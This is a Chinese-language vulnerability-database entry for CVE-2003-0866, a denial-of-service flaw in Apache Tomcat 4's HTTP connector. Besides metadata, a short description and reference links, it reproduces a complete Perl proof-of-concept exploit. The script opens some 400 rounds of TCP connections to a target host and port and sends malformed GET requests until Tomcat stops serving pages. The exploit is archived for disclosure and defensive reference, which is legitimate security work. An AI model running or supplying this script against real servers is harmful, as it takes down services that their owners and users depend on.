Apache Tomcat Non-HTTP请求远程拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107515 漏洞类型 其他
发布时间 2003-10-15 更新时间 2008-09-05
CVE编号 CVE-2003-0866 CNNVD-ID CNNVD-200311-032
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/23245
https://www.securityfocus.com/bid/8824
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200311-032
|漏洞详情
Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。Apache Tomcat在处理部分非HTTP类型请求时存在问题,远程攻击者可以利用这个漏洞对服务器进行拒绝服务攻击。目前没有详细漏洞细节提供。
|漏洞EXP
source: http://www.securityfocus.com/bid/8824/info

Apache Tomcat 4 has been reported prone to a remotely triggered denial-of-service vulnerability when handling undisclosed non-HTTP request types.

When certain non-HTTP request types are handled by the Tomcat HTTP connector, the Tomcat server will reject subsequent requests on the affected port until the service is restarted. 

#!/usr/bin/perl
#
# PoC - DoS Exploit for Apache Tomcat 4
# by Oliver Karow - oliver.karowNOSPAM__AT__gmx.de
# http://www.oliverkarow.de/research/tomcat_crash.txt
#
# Run this script against the Tomcat Admin Port. After execution, the page will not be accessible any more.
# The port is still open and accepting connections, but not responding with content. To verify, connect with your browser
# to the port.
#

use IO::Socket;

$ip="192.168.0.16";
$port="8080";
$counter =0;


@attackpattern=("'");
for ($x=0;$x<=400;$x++){
  $headerLine="GET /dummy/dontexist.pl? HTTP/1.0\n\n";
  @temp=split(/(\/)/,$headerLine);
  foreach (@temp){
     $replaceme=$_;
       foreach(@attackpattern){
    $attack=$_;
    $newheaderline=$headerLine;
      $newheaderline=~ s/$replaceme/$attack/i;
      $remote=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, PeerPort=>$port, Timeout=>5) or die "Connection not possible\n";
    print $remote $newheaderline;
    print "\nRequest: ".$counter++." \t".$newheaderline."\n";
       $remote->close;
  }
  }
}
|受影响的产品
Sun Solaris 9_x86 Sun Solaris 9_sparc Sun Solaris 9 Sun Solaris 10_x86 Sun Solaris 10_sparc Sun Solaris 10 Apache Tomcat 4.0.6
|参考资料

来源:BID
名称:8824
链接:http://www.securityfocus.com/bid/8824
来源:DEBIAN
名称:DSA-395
链接:http://www.debian.org/security/2003/dsa-395
来源:bugs.debian.org
链接:http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=215506
来源:XF
名称:tomcat-non-http-dos(13429)
链接:http://xforce.iss.net/xforce/xfdb/13429
来源:VUPEN
名称:ADV-2008-1979
链接:http://www.frsirt.com/english/advisories/2008/1979/references
来源:tomcat.apache.org
链接:http://tomcat.apache.org/security-4.html
来源:SUNALERT
名称:239312
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-239312-1
来源:SECUNIA
名称:30908
链接:http://secunia.com/advisories/30908
来源:SECUNIA
名称:30899
链接:http://secunia.com/advisories/30899